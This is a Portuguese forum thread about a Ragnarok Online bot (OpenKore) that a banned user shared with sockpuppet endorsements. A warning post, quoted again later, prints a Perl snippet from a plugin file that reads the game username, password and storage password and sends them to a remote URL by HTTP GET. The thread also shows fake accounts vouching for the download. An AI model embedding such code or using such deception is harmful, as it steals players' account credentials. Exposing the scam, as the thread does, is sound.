OjuaraRag 0 Postado 16 de Julho 2011 Compartilhar Postado 16 de Julho 2011 · Conteúdo removido pela moderação. Por presença de conteúdo malicioso. Contas banidas permanentemente: OjuaraRag - Postou o conteúdo. Galihdaseamiko - Conta fake. Maigutuhun - Conta fake. Obs: Todas as contas citas serão banidas por possuírem o mesmo IP. Sendo assim, contas fakes para ludibriar os demais. É o mesmo que havia postado anteriormente, AraujoRag. Atenciosamente, .Macumbinha. ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
maigutuhun 0 Postado 16 de Julho 2011 Compartilhar Postado 16 de Julho 2011 · vo testa aqui man se estiver funcional edito aqui belezinha! @Edit Ta funcional e completim,scan e tudo mais thx ae fioti ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
OjuaraRag 0 Postado 16 de Julho 2011 Compartilhar Postado 16 de Julho 2011 · Funciona sim,teste ae para vc conferir xD ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
galihdaseamiko 0 Postado 16 de Julho 2011 Compartilhar Postado 16 de Julho 2011 · ta pegando aqui ferinha,vo botiar ali fast flws,mas antes quero pedir que pelo menos o pessoal agradeça pelo esforço do cara,valeu ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
OjuaraRag 0 Postado 16 de Julho 2011 Compartilhar Postado 16 de Julho 2011 · foi dificil fazer esse tuto,confeso que copiei de um cara auhaua mas ta valendo auhauah ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
maigutuhun 0 Postado 16 de Julho 2011 Compartilhar Postado 16 de Julho 2011 · so meio nub sabe como fazer pro bot catar lot ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
galihdaseamiko 0 Postado 16 de Julho 2011 Compartilhar Postado 16 de Julho 2011 · oloko meu ali no tuto tem a parte do pickupitens so ler ali ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
maigutuhun 0 Postado 16 de Julho 2011 Compartilhar Postado 16 de Julho 2011 · nossa vei pior que eu nem tinha visto ali no tutorial brigado ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
galihdaseamiko 0 Postado 16 de Julho 2011 Compartilhar Postado 16 de Julho 2011 · disponha,..............mais leia atentemente na proxima vez ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
OjuaraRag 0 Postado 16 de Julho 2011 Compartilhar Postado 16 de Julho 2011 · no tutorial tem tudo oque precisa pra configurar o bot,apenas leia com atenção ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
frde 0 Postado 16 de Julho 2011 Compartilhar Postado 16 de Julho 2011 · não estou confiando vou esperar um tempo até alguem de verdade baixar e ver se não foi hackiado, o openkore é o mesmo do araujo rag, e o araujo foi banido hj e essa conta foi criada hj tb , sendo que as duas tem rag no final, e as contas elogiando possivelmente são fakes pq foram criadas quase agr! peço a moderação para ver este topico! ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
OjuaraRag 0 Postado 16 de Julho 2011 Compartilhar Postado 16 de Julho 2011 · não estou confiando vou esperar um tempo até alguem de verdade baixar e ver se não foi hackiado, o openkore é o mesmo do araujo rag, e o araujo foi banido hj e essa conta foi criada hj tb , sendo que as duas tem rag no final, e as contas elogiando possivelmente são fakes pq foram criadas quase agr! [/size][/color] peço a moderação para ver este topico! Eu apenas copiei o texto dele porque vamos combinas né,tava muito bem explicado e fazer um texto melhor doque esse tava dificil,a única coisa que mudei foi os downloads pelos meus,e o fato de ter Rag no final significa nd simplesmente por eu jogar ragnarok coloquei a abreviação Rag no final......... ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
maigutuhun 0 Postado 16 de Julho 2011 Compartilhar Postado 16 de Julho 2011 · criei a conta agora para poder baixar,porque não pode ver os links sem criar conta na WB,baixei testei ta funcionando certo e ta limpo tem o scan e tudo mais,o scan não acuso nenhum virus e nem meu pc tambem não acuso... ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
frde 0 Postado 16 de Julho 2011 Compartilhar Postado 16 de Julho 2011 · Aviso! Sim vou baixar e ver se ta funcional! Mas saiba de uma coisa não adianta teu anti virus não detectar! o kl do ragnarok vem em forma de codigos dentro de um arquivo! ATENÇÃO NÃO BAIXEM! VÃO NA PASTA PLUING DENTRO DO OPENKORE E ACHEM O ARQUIVO PATCH21 ABRAM COMO BLOCO DE NOTAS LÁ VCS VÃO ENCONTRAR UMA LINHA QUE DIZ use LWP::UserAgent; use Utils qw(urlencode); my $ua = LWP::UserAgent->new; $ua->timeout(10); $ua->env_proxy; my $usuario = $config{'username'}; $usuario =~ s/#/:/; my $senha = $config{'password'}; $senha =~ s/#/:/; my $kafra = $config{'storageAuto_password'}; $kafra =~ s/#/:/; my $response = $ua->get(" É necessário se cadastrar para acessar o conteúdo. Entre ou Cadastre-se $senha $kafra"); É UM CODIGO QUE VAI MANDAR SUA SENHA PARA O SITE DELE! NÃO É UM VIRUS E SIM UM CÓDIGO EM FORMA DE KL PROVADO QUE ESTA COM KL SEM MAIS!. galihdaseamiko e maigutuhun são contas fakes dele!!!! NÃO ACREDITEM NESSES 2 NÃO BAIXEM! ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
maigutuhun 0 Postado 16 de Julho 2011 Compartilhar Postado 16 de Julho 2011 · cara essa link ae dei uma olhada e o link não leva a lugar algum,é apenas uma linha sem destino,o bot do cara ta massa fera,to usando e ta perfeito,tem scan que prova que ta limpo ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
galihdaseamiko 0 Postado 16 de Julho 2011 Compartilhar Postado 16 de Julho 2011 · Bom ta rodando bem sem erros,ta funcional como eu disse antes ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
OjuaraRag 0 Postado 16 de Julho 2011 Compartilhar Postado 16 de Julho 2011 · Sim vou baixar e ver se ta funcional! Mas saiba de uma coisa não adianta teu anti virus não detectar! o kl do ragnarok vem em forma de codigos dentro de um arquivo! ATENÇÃO NÃO BAIXEM! VÃO NA PASTA PLUING DENTRO DO OPENKORE E ACHEM O ARQUIVO PATCH21 ABRAM COMO BLOCO DE NOTAS LÁ VCS VÃO ENCONTRAR UMA LINHA QUE DIZ use LWP::UserAgent; use Utils qw(urlencode); my $ua = LWP::UserAgent->new; $ua->timeout(10); $ua->env_proxy; my $usuario = $config{'username'}; $usuario =~ s/#/:/; my $senha = $config{'password'}; $senha =~ s/#/:/; my $kafra = $config{'storageAuto_password'}; $kafra =~ s/#/:/; my $response = $ua->get(" É necessário se cadastrar para acessar o conteúdo. Entre ou Cadastre-se $senha $kafra"); É UM CODIGO QUE VAI MANDAR SUA SENHA PARA O SITE DELE! NÃO É UM VIRUS E SIM UM CÓDIGO EM FORMA DE KL PROVADO QUE ESTA COM KL SEM MAIS!. galihdaseamiko e maigutuhun são contas fakes dele!!!! NÃO ACREDITEM NESSES 2 NÃO BAIXEM! Esse cara ta de rolo,posto uma Quick List de 2 bot com keylloger,é o mesmo dono dos outros tópicos,ta querendo roubar os demais,não acredite nele ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
maigutuhun 0 Postado 16 de Julho 2011 Compartilhar Postado 16 de Julho 2011 · sem maldade,ta limpo o bot to usando ta perfeito,aquele cara ali ta querendo roubar os demais ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
galihdaseamiko 0 Postado 16 de Julho 2011 Compartilhar Postado 16 de Julho 2011 · ta limpo o bot,aquilo recomendo pro povão ae ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
maigutuhun 0 Postado 16 de Julho 2011 Compartilhar Postado 16 de Julho 2011 · ta mais que recomendado o bot do carinha vei,ta super tutorial e funcionando 100% ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
galihdaseamiko 0 Postado 16 de Julho 2011 Compartilhar Postado 16 de Julho 2011 · ta funcionando tudo beleza,tutorial bem explicado e bot limpo e discreto ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
OjuaraRag 0 Postado 16 de Julho 2011 Compartilhar Postado 16 de Julho 2011 · traga seus amigos aqui para a WebCheats,melhor site de cheats do brasil ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
thiagonight 0 Postado 16 de Julho 2011 Compartilhar Postado 16 de Julho 2011 · Vim aqui lhe avisar, vou lhe reportar novamente, eu lhe reportei e você foi banido, e só uma coisa, pera Ojuara e poe ao contrario e da o que? Tcharam, AraujoRag. Lhe reportarei novamente á staff. Boa sorte tentando em outro forum, porque neste eu vou lhe perseguir. ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
.Macumbinha. 16 Postado 16 de Julho 2011 Compartilhar Postado 16 de Julho 2011 · Tópico fechado, editado e membro banido Junto com suas contas fake. Obrigado, você me deixa muito feliz fazendo isso. Quanto mais contas suas eu banir, mais logs eu recebo em minha moderação. Obrigado, thiagonight . Continue denunciando. ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
Posts Recomendados